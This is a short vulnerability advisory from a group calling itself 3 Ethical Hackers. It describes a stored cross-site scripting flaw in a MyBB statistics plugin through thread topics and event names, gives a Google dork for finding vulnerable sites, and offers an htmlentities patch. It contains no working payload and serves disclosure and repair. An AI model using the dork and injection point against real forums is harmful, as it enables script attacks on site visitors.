+--------------------------+-------------------------------+
|             3 Ethical Hackers . com             |
+--------------------------+-------------------------------+
        irc.smashthestack.org #3ethical



Affected software:  Advanced Stats On Indexing plugin for mybb php bbs
Versions: <=3.1
link:
http://mods.mybb.com/view/advanced-stats-on-index-portal-for-mybb-1-4-x

Google Dork: inurl:/asoi.php?asoi=
(returns ~200 hits)

------------------------------POC/Info--------------------------------------
  The affected application fails to properly sanitize user input from
user-modified fields.  Affected fields are:

Usernames (user creation script prevents special chars in name[ver 1.4.13])
Events
Thread Topics

These fields are displayed on the home page where the plugin resides.  When
a malicious thread topic or event is loaded into the front page, malicious
javascript can be executed doing anything it wants to the rest of the page.
----------------------------------------------------------------------------
------------------------------Patch-----------------------------------------
change OLD: $lines .= $icon."<a
href=\"".get_thread_link($thread['tid'])."\">".$thread['subject']."</a>
(".$lang->asoi_by." ";

To Patch: $lines .= $icon."<a
href=\"".get_thread_link($thread['tid'])."\">".htmlentities($thread['subject'])."</a>
(".$lang->asoi_by." ";

diff: .htmlentities($thread['subject']).

put that for every instance of thread subject or event name or any other
user-editable field to perform "bad" character cleansing

--------------------------------------------------------------------------------
--------------------------Credits--------------------------------------------
3ethicalhackers.com >> we don't need to post our handles kthxbai

::::::::::::::::::::::::::Greetz:::::::::::::::::::::::::::::::::::::::::::::

gr33tz to SMP (irc.smashthestack.org #smpctf)
Mason/d3p0rt


JOIN US IN IRC
IRC.SMASHTHESTACK.ORG #3ETHICAL
FORUMS @ 3ETHICALHACKERS.COM

>>EOF